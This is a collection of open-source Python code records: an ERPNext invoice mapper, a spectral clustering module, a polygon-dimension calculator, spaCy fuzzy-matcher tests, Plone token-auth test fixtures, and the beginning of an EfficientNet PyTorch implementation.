item.account_head.replace(\n\t\t\t\t\tsource_company_abbr, target_company_abbr\n\t\t\t\t)\n\t\t\t\n\t\ttarget.run_method(\"set_missing_values\")\n\t\n\tdef update_accounts(source_doc, target_doc, source_parent):\n\t\ttarget_company = source_parent.customer\n\t\tdoc = frappe.get_doc(\"Company\", target_company)\n\n\t\tif source_doc.pr_detail:\n\t\t\ttarget_doc.purchase_receipt = frappe.db.get_value(\"Purchase Receipt Item\", source_doc.pr_detail, 'parent')\n\t\tif source_doc.purchase_order_item:\n\t\t\ttarget_doc.purchase_order = frappe.db.get_value(\"Purchase Order Item\", source_doc.purchase_order_item, 'parent')\n\n\t\ttarget_doc.income_account = doc.default_income_account\n\t\ttarget_doc.expense_account = doc.default_expense_account\n\t\ttarget_doc.cost_center = doc.cost_center\n\t\n\tdoclist = get_mapped_doc(\"Sales Invoice\", self.name,\t{\n\t\t\"Sales Invoice\": {\n\t\t\t\"doctype\": \"Purchase Invoice\",\n\t\t\t\"field_map\": {\n\t\t\t\t\"name\": \"bill_no\",\n\t\t\t\t\"posting_date\": \"bill_date\",\n\t\t\t},\n\t\t\t\"field_no_map\": [\n\t\t\t\t\"taxes_and_charges\",\n\t\t\t\t\"series_value\",\n\t\t\t\t\"update_stock\",\n\t\t\t\t\"real_difference_amount\"\n\t\t\t],\n\t\t},\n\t\t\"Sales Invoice Item\": {\n\t\t\t\"doctype\": \"Purchase Invoice Item\",\n\t\t\t\"field_map\": {\n\t\t\t\t\"pr_detail\": \"pr_detail\",\n\t\t\t\t\"purchase_order_item\": \"po_detail\",\n\t\t\t},\n\t\t\t\"field_no_map\": [\n\t\t\t\t\"income_account\",\n\t\t\t\t\"expense_account\",\n\t\t\t\t\"cost_center\",\n\t\t\t\t\"warehouse\",\n\t\t\t], \"postprocess\": update_accounts,\n\t\t}\n\t}, target_doc, set_missing_values)\n\n\treturn doclist\n","repo_name":"questerp/chem_intercompany","sub_path":"chem_intercompany/chem_intercompany/doc_events/sales_invoice.py","file_name":"sales_invoice.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"72633417459","text":"import numpy as np\n\nfrom typing import Dict, Tuple\nfrom collections import Counter\n\nfrom sklearn.cluster import AgglomerativeClustering\nfrom scipy.cluster.hierarchy import dendrogram\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nimport config\nfrom config import *\n\n\nmatplotlib.use('TkAgg')\n\ndef generate_clusters(dist_matrix: np.ndarray, \n                      linkage:str, \n                      distance_threshold: float,\n                      min_cluster_size: int) -> AgglomerativeClustering:\n    \"\"\"\n    Generate clusters using agglomerative (hierarchical) clustering.\n\n    Parameters\n    ----------\n    dist_matrix : np.ndarray\n        distance matrix used for clustering.\n    linkage: str\n        linkage method (see sklearn documentation).\n    distance_threshold: float\n        distance above which clusters will not be merged (see sklearn docs).\n    min_cluster_size: int\n        minimum number of samples a cluster needs in order to be kept.\n\n    Returns\n    -------\n    AgglomerativeClustering\n        clustering of spectra.\n    \"\"\"\n    print(f\"{linkage}-linkage hierarchical clustering...\")\n    clustering = AgglomerativeClustering(\n        n_clusters=None,\n        metric=\"precomputed\", \n        linkage=linkage,\n        distance_threshold=distance_threshold,\n        compute_distances=True).fit(dist_matrix)\n    \n    new_labels = _post_process_clusters(clustering.labels_, min_cluster_size)\n    clustering.labels_ = new_labels\n    clustering.n_clusters_ = _count_clusters(new_labels)\n\n    if config.plot_dendrogram:\n        plot_dendrogram(clustering=clustering, labels=clustering.labels_)\n\n    return clustering\n\n\ndef _post_process_clusters(labels: np.ndarray, min_cluster_size: int) -> np.ndarray:\n    \"\"\"\n    Label clusters smaller than min_cluster_size as noise (-1).\n\n    Parameters\n    ----------\n    labels 
: np.ndarray\n        array of predicted labels.\n\n    Returns\n    -------\n    np.ndarray\n        new labels where samples in clusters smaller than min_cluster_size are replaced by -1 (noise).\n    \"\"\"\n    # count occurrences of labels\n    c = Counter(labels)\n    singleton_labels = [k for k, v in c.items() if v < min_cluster_size]\n    # if a label's cluster is smaller than min_cluster_size, replace with -1 (noise sample)\n    new_labels = [l if l not in singleton_labels else -1 for l in labels]\n    return np.array(new_labels)\n\ndef _count_clusters(labels: np.ndarray) -> int:\n    # count unique cluster labels, excluding the noise label -1\n    return len(np.unique(labels[labels != -1]))\n\n\n# code from: \n# https://scikit-learn.org/stable/auto_examples/cluster/plot_agglomerative_dendrogram.html\ndef plot_dendrogram(clustering, **kwargs):\n    \"\"\"\n    Plot a dendrogram of the clustering result.\n\n    Parameters\n    ----------\n    clustering : AgglomerativeClustering\n        clustering result.\n    \"\"\"\n    # Create linkage matrix and then plot the dendrogram\n\n    # create the counts of samples under each node\n    counts = np.zeros(clustering.children_.shape[0])\n    n_samples = len(clustering.labels_)\n    for i, merge in enumerate(clustering.children_):\n        current_count = 0\n        for child_idx in merge:\n            if child_idx < n_samples:\n                current_count += 1  # leaf node\n            else:\n                current_count += counts[child_idx - n_samples]\n        counts[i] = current_count\n\n    linkage_matrix = np.column_stack(\n        [clustering.children_, clustering.distances_, counts]\n    ).astype(float)\n\n    # plot the corresponding dendrogram\n    fig = plt.figure(\"Clustering dendrogram\")\n    dendrogram(linkage_matrix, **kwargs)\n    fig.show()","repo_name":"Janne98/falcon-ext","sub_path":"falcon_ext/cluster/hierarchical.py","file_name":"hierarchical.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28285445509","text":"if 1:   # Header\n    # Copyright, license\n    # These \"trigger strings\" can be managed with trigger.py\n    #∞copyright∞# Copyright (C) 2014 Don Peterson #∞copyright∞#\n    #∞contact∞# gmail.com@someonesdad1 #∞contact∞#\n    #∞license∞#\n    # Licensed under the Open Software License version 3.0.\n    # See http://opensource.org/licenses/OSL-3.0.\n    #∞license∞#\n    #∞what∞#\n    # Calculate parameters of a regular polygon given the inscribed or\n    # circumscribed circle diameter.\n    #∞what∞#\n    #∞test∞# #∞test∞#\n    # Standard imports\n    from fractions import Fraction\n    import sys\n    import os\n    import getopt\n    from pdb import set_trace as xx\n    # Custom imports\n    from wrap import dedent\n    from color import TRM as t\n    from f import flt, pi, sqrt, sin, cos, tan\n    # Global variables\n    class g:\n        pass\n    g.width = int(os.environ.get(\"COLUMNS\", 80)) - 1\n    ii = isinstance\n    isatty = sys.stdout.isatty()\n    t.ti = t(\"ornl\") if isatty else \"\"\n    t.hi = t(\"yell\") if isatty else \"\"\n    t.insc = t(\"purl\") if isatty else \"\"\n    t.circ = t(\"trq\") if isatty else \"\"\n    t.nn = t.n if isatty else \"\"\nif 1:   # Utility\n    def Error(*msg, status=1):\n        print(*msg, file=sys.stderr)\n        exit(status)\n    def Usage(d, status=1):\n        print(dedent(f'''\n        Usage:  {sys.argv[0]} [options] dia1 [dia2...]\n          Print dimensions of regular polygons for given diameter(s) as either\n          the inscribed or circumscribed circle diameter.  The diameters can\n          be strings like '47', '4.7', '7/16', or '1-7/16'.\n        Options:\n            -a      Abbreviate numbers [{d['-a']}]\n            -c l    Color highlight the sides in the list l [{d[\"-c\"]}]\n            -d n    Number of significant digits to print [{d[\"-d\"]}]\n            -n l    Which sides to print; must be a comma-separated list of\n                    integers or a range() call.  
[{d[\"-n\"]}]\n -t Produce a table of useful factors allowing you to calculate\n various parameters of polygons given certain dimensions.\n '''))\n exit(status)\n def ParseCommandLine(d):\n d[\"-a\"] = True # Abbreviate numbers\n d[\"-c\"] = \"\" # Which lines to highlight\n d[\"-d\"] = 4 # Number of significant digits\n d[\"-n\"] = \"3,4,5,6,7,8\"\n d[\"-t\"] = False # Print the table\n try:\n opts, diameters = getopt.getopt(sys.argv[1:], \"ac:d:n:t\")\n except getopt.GetoptError as e:\n print(str(e))\n exit(1)\n for o, arg in opts:\n if o[1] in \"at\":\n d[o] = not d[o]\n elif o in (\"-c\",):\n d[\"-c\"] = arg\n elif o in (\"-d\",):\n try:\n d[\"-d\"] = int(arg)\n if not (1 <= d[\"-d\"] <= 15):\n raise ValueError()\n except ValueError:\n msg = (\"-d option's argument must be an integer between \"\n \"1 and 15\")\n Error(msg)\n elif o in (\"-n\",):\n if \"range\" in arg:\n d[\"-n\"] = ','.join(str(i) for i in list(eval(arg)) if i > 2)\n else:\n d[\"-n\"] = arg\n x = flt(0)\n x.n = d[\"-d\"]\n if d[\"-a\"]:\n x.rtz = x.rtdp = True\n x.low = 1e-4\n x.high = 1e6\n if not d[\"-t\"] and not diameters:\n Usage(d)\n # Convert d[\"-c\"] to a set of integers\n s = d[\"-c\"].split(\",\")\n d[\"-c\"] = set([int(i) for i in s]) if s != [\"\"] else set([])\n return diameters\nif 1: # Core functionality\n def Convert(size):\n '''Convert the string size to a flt. Can be an integer, flt,\n or fraction of e.g. the forms 7/8 or 1-7/8.\n '''\n if \"/\" in size:\n ip = 0\n num, denom = size.split(\"/\")\n if \"-\" in num:\n ip, num = num.split(\"-\")\n num, denom, ip = [int(i) for i in (num, denom, ip)]\n return flt(Fraction(num + ip*denom, denom))\n else:\n return flt(size)\n def PrintFormulaTable():\n '''Print a table similar to the table on page 1-39 of Mark's\n \"Standard Handbook for Mechanical Engineers\", 7th ed., 1967.\n '''\n def F(x, w=None):\n '''str of flt x with leading 0 removed. If w is not None, it's a\n width to center the string of x in.\n '''\n s = str(x)\n if s[0] == \"0\" and s[1] == \".\":\n s = s[1:]\n if w is None:\n return s\n return f\"{s:^{w}s}\"\n # Check of formulas: I drew a 6\" diameter circle and used a\n # 30-60-90 triangle to draw a hexagon around it. The measurements\n # agreed with the values calculated with the table to better than\n # 0.1%.\n print(dedent('''\n Regular polygons\n d = inscribed circle diameter, D = circumscribed circle diameter, A = area,\n s = perimeter, a = length of one side, T = angle subtended by side\n '''))\n # Width of printout: the column for n is 2 wide and the remaining 9\n # columns are the width of a flt at current significance. The smallest\n # number (and thus the longest) will be a/D for n=64. This thus\n # defines the width w for each column.\n s = F(sin(pi/64))\n w = len(s)\n # Use new printing methods with flt and Unicode. 
There are 9\n        # columns for flt and we want to fit into g.width if possible.\n        def f(x):\n            return 4 + 9*x + 3\n        while True:\n            if f(w + 1) < g.width:\n                w += 1\n            else:\n                break\n        print(f\"{'n':^2s}\", end=\" \")\n        for s in \"T(deg) A/d² A/D² A/a² d/a D/a a/d a/D D/d\".split():\n            print(f\"{s:^{w}s}\", end=\" \")\n        print()\n        sizes = list(range(3, 11)) + [12, 15, 16, 20, 24, 32, 48, 60, 64]\n        for n in sizes:\n            colorize = n in opts[\"-c\"]\n            res = []\n            K = pi/n\n            res.append(\"{0:^2d}\".format(n))\n            res.append(F(2*K*180/pi, w))        # T\n            res.append(F(n*tan(K)/4, w))        # A/d^2\n            res.append(F(n*sin(2*K)/8, w))      # A/D^2\n            res.append(F(n/(tan(K)*4), w))      # A/a^2\n            doa, Doa = 1/tan(K), 1/sin(K)\n            res.append(F(doa, w))               # d/a\n            res.append(F(Doa, w))               # D/a\n            res.append(F(1/doa, w))             # a/d\n            res.append(F(1/Doa, w))             # a/D\n            res.append(F(Doa/doa, w))           # D/d\n            if colorize:\n                print(f\"{t.hi}\", end=\"\")\n            print(' '.join(res))\n            if colorize:\n                print(f\"{t.nn}\", end=\"\")\n        if 1:   # Print formulas\n            print()\n            print(dedent('''\n            Formulas:\n                k = π/n            T = 360*k/π\n                a/d = tan(k)       A/d² = n*tan(k)/4\n                a/D = sin(k)       A/D² = n*sin(2*k)/8\n                D/d = 1/cos(k)     A/a² = n/(4*tan(k))\n            \n                a = d*tan(k) = D*sin(k)\n                r = d/2 = sqrt(R² - a²/4) = a/(tan(k)*2) = R*cos(k)\n                R = D/2 = sqrt(r² + a²/4) = a/(sin(k)*2) = r/cos(k)\n                A = n*a*r/2 = n*a/2*sqrt((D² - a²)/4)\n                  = n*a²*cot(k)/4 = n*r²*tan(k) = n*R²*sin(2*k)/2\n                s = n*a = 2*n*r*tan(k)\n            ''', n=4))\n            print('\\nRef:  Marks, \"Std Hdbk for Mech Engrs\", pg 1-39, 7th ed., 1967')\n            exit(0)\n    def Title():\n        print(dedent(f'''\n        {t.ti}Properties of regular polygons{t.nn}\n          d = inscribed diameter\n          D = circumscribed diameter\n          a = length of side\n        '''))\n    def Poly(s, n, circumscribed=False, leave_out=\"\"):\n        '''Given the diameter in the string s, number of sides n, and\n        options dictionary opts, calculate the parameters and print the\n        table.  
Leave out the indicated column (will only be d or D).\n        -----------------\n        Definitions are:\n          d = inscribed circle diameter\n          D = circumscribed circle diameter\n          s = perimeter\n          A = area or surface area\n          a = length of side\n          r = radius of inscribed circle = d/2\n          R = radius of circumscribed circle = D/2\n          n = number of sides\n        Equations are:\n          theta = 2*pi/n = central angle subtended by side\n          K = theta/2\n          a = length of side = d*tan(K) = D*sin(K)\n          r = sqrt(R^2 - a^2/4) = a*cot(K)/2 = R*cos(K)\n          R = sqrt(r^2 + a^2/4) = a*csc(K)/2 = r*sec(K) = r/cos(K)\n          A = n*a*r/2 = n*a/2*sqrt((D^2 - a^2)/4)\n            = n*a^2*cot(K)/4 = n*r^2*tan(K) = n*R^2*sin(2*K)/2\n          s = n*a = 2*n*r*tan(K)\n        '''\n        try:\n            d = Convert(s)\n        except Exception:\n            Error(f\"'{s}' is not a valid number\")\n        assert ii(d, (flt, int, Fraction))\n        assert ii(n, int)\n        assert n > 0\n        K = pi/n\n        D = d/cos(K)\n        if circumscribed:\n            D = d\n            d = D*cos(K)\n        a = d*tan(K)\n        A = n*a*d/4\n        s = n*a\n        colorize = n in opts[\"-c\"]\n        if colorize:\n            print(f\"{t.hi}\", end=\"\")\n        if leave_out == \"d\":\n            L = (n, D, a, A, s)\n        elif leave_out == \"D\":\n            L = (n, d, a, A, s)\n        else:\n            Error(f\"Program bug: leave_out = {leave_out!r}\")\n        for x in L:\n            w = opts[\"-d\"] + 3\n            print(f\"{x!s:^{w}s}\", end=\" \")\n        if colorize:\n            print(f\"{t.nn}\", end=\"\")\n        print()\n    def Report(d):\n        '''Print the calculated values assuming the diameter string in d\n        is first an inscribed diameter, then the circumscribed diameter.\n        '''\n        def Print(circumscribed=False, leave_out=\"\"):\n            fmt = \"{{0:^{0}}}\".format(3 + opts[\"-d\"])\n            w = 3 + opts[\"-d\"]\n            for s in \"Sides d D a Area Perim\".split():\n                if s == leave_out:\n                    continue\n                print(f\"{s:^{w}s}\", end=\" \")\n            print()\n            for n in number_of_sides:\n                Poly(d, n, circumscribed, leave_out=leave_out)\n        try:\n            number_of_sides = [int(i) for i in opts[\"-n\"].split(\",\")]\n        except Exception:\n            Error(\"'{0}' is bad -n option\".format(opts[\"-n\"]))\n        print(f\"\\n{t.insc}d =\", d, f\"= inscribed diameter{t.nn}\")\n        Print(circumscribed=False, leave_out=\"d\")\n        print(f\"\\n{t.circ}D =\", d, f\"= circumscribed diameter (distance across points){t.nn}\")\n        Print(circumscribed=True, leave_out=\"D\")\nif __name__ == \"__main__\":\n    opts = {}\n    diameters = ParseCommandLine(opts)\n    if opts[\"-t\"]:\n        PrintFormulaTable()\n    Title()\n    for d in diameters:\n        Report(d)\n        if len(diameters) > 1:\n            print()\n","repo_name":"someonesdad1/plib","sub_path":"pgm/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":11197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"29515752045","text":"\"\"\"Tests for tokenmatcher module.\"\"\"\nimport pickle\nimport typing as ty\n\nimport pytest\nfrom spacy.language import Language\nfrom spacy.tokens import Doc\nfrom spacy.tokens import Span\nimport srsly\n\nfrom spaczz.matcher import TokenMatcher\n\nDATA_PATTERN_1: ty.List[ty.Dict[str, ty.Any]] = [\n    {\"TEXT\": \"SQL\"},\n    {\"LOWER\": {\"FREGEX\": \"(database){s<=1}\"}},\n    {\"LOWER\": {\"FUZZY\": \"access\"}},\n]\n\nDATA_PATTERN_2: ty.List[ty.Dict[str, ty.Any]] = [\n    {\"TEXT\": {\"FUZZY\": \"Sequel\"}},\n    {\"LOWER\": \"db\"},\n]\nNAME_PATTERN: ty.List[ty.Dict[str, ty.Any]] = [{\"TEXT\": {\"FUZZY\": \"Garfield\"}}]\n\n\ndef add_name_ent(\n    matcher: TokenMatcher,\n    doc: Doc,\n    i: int,\n    matches: ty.List[ty.Tuple[str, int, int, int, str]],\n) -> None:\n    \"\"\"Callback on match function. 
Adds \"NAME\" entities to doc.\"\"\"\n _match_id, start, end, _ratio, _pattern = matches[i]\n entity = Span(doc, start, end, label=\"NAME\")\n doc.ents += (entity,) # type: ignore\n\n\n@pytest.fixture\ndef matcher(nlp: Language) -> TokenMatcher:\n \"\"\"It returns a token matcher.\"\"\"\n matcher = TokenMatcher(vocab=nlp.vocab)\n matcher.add(\"DATA\", [DATA_PATTERN_1, DATA_PATTERN_2])\n matcher.add(\"NAME\", [NAME_PATTERN], on_match=add_name_ent)\n return matcher\n\n\n@pytest.fixture\ndef doc(nlp: Language) -> Doc:\n \"\"\"Example doc for search.\"\"\"\n return nlp(\n \"\"\"The manager gave me SQL databesE acess so now I can acces the Sequal DB.\n My manager's name is Grfield.\n \"\"\"\n )\n\n\ndef test_adding_patterns(matcher: TokenMatcher) -> None:\n \"\"\"It adds the \"TEST\" label and some patterns to the matcher.\"\"\"\n assert matcher.patterns == [\n {\n \"label\": \"DATA\",\n \"pattern\": [\n {\"TEXT\": \"SQL\"},\n {\"LOWER\": {\"FREGEX\": \"(database){s<=1}\"}},\n {\"LOWER\": {\"FUZZY\": \"access\"}},\n ],\n \"type\": \"token\",\n },\n {\n \"label\": \"DATA\",\n \"pattern\": [{\"TEXT\": {\"FUZZY\": \"Sequel\"}}, {\"LOWER\": \"db\"}],\n \"type\": \"token\",\n },\n {\n \"label\": \"NAME\",\n \"pattern\": [{\"TEXT\": {\"FUZZY\": \"Garfield\"}}],\n \"type\": \"token\",\n },\n ]\n\n\ndef test_add_without_list_of_patterns_raises_error(matcher: TokenMatcher) -> None:\n \"\"\"Trying to add non-lists of patterns raises a TypeError.\"\"\"\n with pytest.raises(TypeError):\n matcher.add(\"TEST\", [{\"TEXT\": \"error\"}]) # type: ignore\n\n\ndef test_add_with_zero_len_pattern(matcher: TokenMatcher) -> None:\n \"\"\"Trying to add zero-length patterns raises a ValueError.\"\"\"\n with pytest.raises(ValueError):\n matcher.add(\"TEST\", [[]])\n\n\ndef test_len_returns_count_of_labels_in_matcher(matcher: TokenMatcher) -> None:\n \"\"\"It returns the sum of unique labels in the matcher.\"\"\"\n assert len(matcher) == 2\n\n\ndef test_in_returns_bool_of_label_in_matcher(matcher: TokenMatcher) -> None:\n \"\"\"It returns whether a label is in the matcher.\"\"\"\n assert \"DATA\" in matcher\n\n\ndef test_labels_returns_label_names(matcher: TokenMatcher) -> None:\n \"\"\"It returns a tuple of all unique label names.\"\"\"\n assert all(label in matcher.labels for label in (\"DATA\", \"NAME\"))\n\n\ndef test_vocab_prop_returns_vocab(matcher: TokenMatcher, nlp: Language) -> None:\n \"\"\"It returns the vocab it was initialized with.\"\"\"\n assert matcher.vocab == nlp.vocab\n\n\ndef test_remove_label(matcher: TokenMatcher) -> None:\n \"\"\"It removes a label from the matcher.\"\"\"\n matcher.add(\"TEST\", [[{\"TEXT\": \"test\"}]])\n assert \"TEST\" in matcher\n matcher.remove(\"TEST\")\n assert \"TEST\" not in matcher\n\n\ndef test_remove_label_raises_error_if_label_not_in_matcher(\n matcher: TokenMatcher,\n) -> None:\n \"\"\"It raises a ValueError if trying to remove a label not present.\"\"\"\n with pytest.raises(ValueError):\n matcher.remove(\"TEST\")\n\n\ndef test_matcher_returns_matches(matcher: TokenMatcher, doc: Doc) -> None:\n \"\"\"Calling the matcher on a `Doc` object returns matches.\"\"\"\n assert matcher(doc) == [\n (\"DATA\", 4, 7, 91, srsly.json_dumps(DATA_PATTERN_1)),\n (\"DATA\", 13, 15, 87, srsly.json_dumps(DATA_PATTERN_2)),\n (\"NAME\", 22, 23, 93, srsly.json_dumps(NAME_PATTERN)),\n ]\n\n\ndef test_matcher_returns_matches_in_expected_order(nlp: Language) -> None:\n \"\"\"Calling the matcher on a `Doc` object returns matches in expected order.\"\"\"\n matcher = TokenMatcher(nlp.vocab)\n 
matcher.add(\n \"COMPANY\",\n [\n [\n {\"IS_UPPER\": True, \"OP\": \"+\"},\n {\"IS_PUNCT\": True, \"OP\": \"?\"},\n {\"TEXT\": {\"REGEX\": r\"S\\.\\s?[A-Z]\\.?\\s?[A-Z]?\\.?\"}},\n {\"IS_PUNCT\": True, \"OP\": \"?\"},\n ]\n ],\n )\n doc = nlp(\"My company is called LARGO AND MARMG S.L.\")\n matches = matcher(doc)\n assert doc[matches[0][1] : matches[0][2]].text == \"LARGO AND MARMG S.L.\"\n\n\ndef test_matcher_returns_empty_list_if_no_matches(nlp: Language) -> None:\n \"\"\"Calling the matcher on a `Doc` object with no matches returns empty list.\"\"\"\n matcher = TokenMatcher(nlp.vocab)\n matcher.add(\"TEST\", [[{\"TEXT\": {\"FUZZY\": \"blah\"}}]])\n doc = nlp(\"No matches here.\")\n assert matcher(doc) == []\n\n\ndef test_matcher_uses_on_match_callback(matcher: TokenMatcher, doc: Doc) -> None:\n \"\"\"It utilizes callback on match functions passed when called on a Doc object.\"\"\"\n matcher(doc)\n ent_text = [ent.text for ent in doc.ents]\n assert \"Grfield\" in ent_text\n\n\ndef test_pickling_matcher(nlp: Language) -> None:\n \"\"\"It pickles the matcher object.\"\"\"\n matcher = TokenMatcher(nlp.vocab)\n matcher.add(\"NAME\", [[{\"TEXT\": {\"FUZZY\": \"Ridley\"}}, {\"TEXT\": {\"FUZZY\": \"Scott\"}}]])\n bytestring = pickle.dumps(matcher)\n assert type(bytestring) == bytes\n\n\ndef test_unpickling_matcher(nlp: Language) -> None:\n \"\"\"It unpickles the matcher object.\"\"\"\n matcher = TokenMatcher(nlp.vocab)\n matcher.add(\"NAME\", [[{\"TEXT\": {\"FUZZY\": \"Ridley\"}}, {\"TEXT\": {\"FUZZY\": \"Scott\"}}]])\n bytestring = pickle.dumps(matcher)\n matcher = pickle.loads(bytestring)\n doc = nlp(\"Rdley Scot was the director of Alien.\")\n assert matcher(doc) == [\n (\"NAME\", 0, 2, 90, '[{\"TEXT\":{\"FUZZY\":\"Ridley\"}},{\"TEXT\":{\"FUZZY\":\"Scott\"}}]')\n ]\n","repo_name":"gandersen101/spaczz","sub_path":"tests/test_matcher/test_tokenmatcher.py","file_name":"test_tokenmatcher.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"57"} +{"seq_id":"521019389","text":"from ftw.tokenauth.permissions import ManageOwnServiceKeys\nfrom ftw.tokenauth.testing import FTW_TOKENAUTH_FUNCTIONAL_TESTING\nfrom ftw.tokenauth.testing import FTW_TOKENAUTH_FUNCTIONAL_ZSERVER_TESTING\nfrom plone import api\nfrom unittest2 import TestCase\nimport transaction\n\n\nclass FunctionalTestCase(TestCase):\n\n layer = FTW_TOKENAUTH_FUNCTIONAL_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n uf = api.portal.get_tool('acl_users')\n self.plugin = uf['token_auth']\n self.portal.manage_permission(ManageOwnServiceKeys, roles=['Member'])\n transaction.commit()\n\n\nclass FunctionalZServerTestCase(TestCase):\n\n layer = FTW_TOKENAUTH_FUNCTIONAL_ZSERVER_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n uf = api.portal.get_tool('acl_users')\n self.plugin = uf['token_auth']\n self.portal.manage_permission(ManageOwnServiceKeys, roles=['Member'])\n transaction.commit()\n","repo_name":"4teamwork/ftw.tokenauth","sub_path":"ftw/tokenauth/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"21247813839","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Swish(nn.Module):\n def __init__(self, name=None):\n super().__init__()\n self.name = 
name\n \n def forward(self,x):\n return x * torch.sigmoid(x)\n \nclass Conv2dSamepadding(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, dilation=1, groups=1, bias=True, name=None):\n super().__init__(in_channels, out_channels, kernel_size, stride, padding=0, dilation=dilation, groups=groups, bias=bias)\n self.stride = self.stride if len(self.stride) == 2 else [self.stride[0]] * 2\n self.name = name\n \n def forward(self,x):\n input_h, input_w = x.size()[2:]\n kernel_h, kernel_w = self.weight.size()[2:]\n stride_h, stride_w = self.stride\n output_h, output_w = math.ceil(input_h / stride_h), math.ceil(input_w / stride_w)\n pad_h = max((output_h-1) * self.stride[0] + (kernel_h-1) * self.dilation[0]+1 - input_h, 0)\n pad_w = max((output_w-1) * self.stride[1] + (kernel_w-1) * self.dilation[1]+1 - input_w, 0)\n if pad_h > 0 or pad_w > 0:\n x = F.pad(x, [pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2])\n return F.conv2d(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n \nclass BatchNorm2d(nn.BatchNorm2d):\n def __init__(self, num_features, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True, name=None):\n super().__init__(num_features, eps=eps, momentum=momentum, affine=affine, track_running_stats=track_running_stats)\n self.name = name\n \ndef drop_connect(inputs, drop_connect_rate, training):\n if not training:\n return inputs\n batch_size = inputs.shape[0]\n keep_prob = 1.0 - drop_connect_rate\n random_tensor = keep_prob\n random_tensor += torch.rand([batch_size, 1, 1, 1], dtype=inputs.dtype, device=inputs.device)\n binary_tensor = torch.floor(random_tensor)\n output = inputs / keep_prob * binary_tensor\n return output\n\nclass MBConvBlock(nn.Module):\n def __init__(self, block_args, global_params, idx):\n super().__init__()\n \n block_name = 'blocks_' + str(idx) + '_'\n \n self.block_args = block_args\n self.batch_norm_momentum = 1 - global_params.batch_norm_momentum\n self.batch_norm_epsilon = global_params.batch_norm_epsilon\n self.has_se = (self.block_args.se_ratio is not None) and (0 < self.block_args.se_ratio <= 1)\n self.id_skip = block_args.id_skip\n \n self.swish = Swish(block_name + '_swish')\n \n # Expansion phase\n in_channels = self.block_args.input_filters\n out_channels = self.block_args.input_filters * self.block_args.expand_ratio\n if self.block_args.expand_ratio != 1:\n self._expand_conv = Conv2dSamepadding(in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n bias=False,\n name=block_name + 'expansion_conv')\n self._bn0 = BatchNorm2d(num_features=out_channels,\n momentum=self.batch_norm_momentum,\n eps=self.batch_norm_epsilon,\n name=block_name + 'expansion_batch_norm')\n \n # Depth-wise convolution phase\n kernel_size = self.block_args.kernel_size\n strides = self.block_args.strides\n self._depthwise_conv = Conv2dSamepadding(in_channels=out_channels,\n out_channels=out_channels,\n groups=out_channels,\n kernel_size=kernel_size,\n stride=strides,\n bias=False,\n name=block_name + 'depthwise_conv')\n self._bn1 = BatchNorm2d(num_features=out_channels,\n momentum=self.batch_norm_momentum,\n eps=self.batch_norm_epsilon,\n name=block_name + 'depthwise_batch_norm')\n \n # Squeeze and Excitation\n if self.has_se:\n num_squeezed_channels = max(1, int(self.block_args.input_filters * self.block_args.se_ratio))\n self._se_reduce = Conv2dSamepadding(in_channels=out_channels,\n out_channels=num_squeezed_channels,\n kernel_size=1,\n name=block_name + 'se_reduce')\n 
self._se_expand = Conv2dSamepadding(in_channels=num_squeezed_channels,\n out_channels=out_channels,\n kernel_size=1,\n name=block_name + 'se_expand')\n \n # output phase\n final_output_channels = self.block_args.output_filters\n self._project_conv = Conv2dSamepadding(in_channels=out_channels,\n out_channels=final_output_channels,\n kernel_size=1,\n bias=False,\n name=block_name + 'output_conv')\n self._bn2 = BatchNorm2d(num_features=final_output_channels,\n momentum=self.batch_norm_momentum,\n eps=self.batch_norm_epsilon,\n name=block_name + 'output_batch_norm')\n \n def forward(self, x, drop_connect_rate=None):\n identity = x\n if self.block_args.expand_ratio != 1:\n x = self._expand_conv(x)\n x = self._bn0(x)\n x = self.swish(x)\n \n x = self._depthwise_conv(x)\n x = self._bn1(x)\n x = self.swish(x)\n \n if self.has_se:\n x_squeezed = F.adaptive_avg_pool2d(x,1)\n x_squeezed = self._se_expand(self.swish(self._se_reduce(x_squeezed)))\n x = torch.sigmoid(x_squeezed) * x\n \n x = self._bn2(self._project_conv(x))\n \n input_filters, output_filters = self.block_args.input_filters, self.block_args.output_filters\n if self.id_skip and self.block_args.strides == 1 and input_filters == output_filters:\n if drop_connect_rate:\n x = drop_connect(x, drop_connect_rate=drop_connect_rate, training=self.training)\n x = x + identity\n return x\n \ndef double_conv(in_channels, out_channels):\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True)\n )\n\ndef up_conv(in_channels, out_channels):\n return nn.ConvTranspose2d(in_channels, out_channels, kernel_size=2, stride=2)\n\ndef custom_head(in_channels, out_channels):\n return nn.Sequential(\n nn.Dropout(),\n nn.Linear(in_channels, 512),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(512, out_channels),\n )\n\nimport re\nfrom collections import namedtuple\n\nGlobalParams = namedtuple('GlobalParams', ['batch_norm_momentum','batch_norm_epsilon', 'dropout_rate','num_classes',\n 'width_coefficient','depth_coefficient', 'depth_divisor', 'min_depth',\n 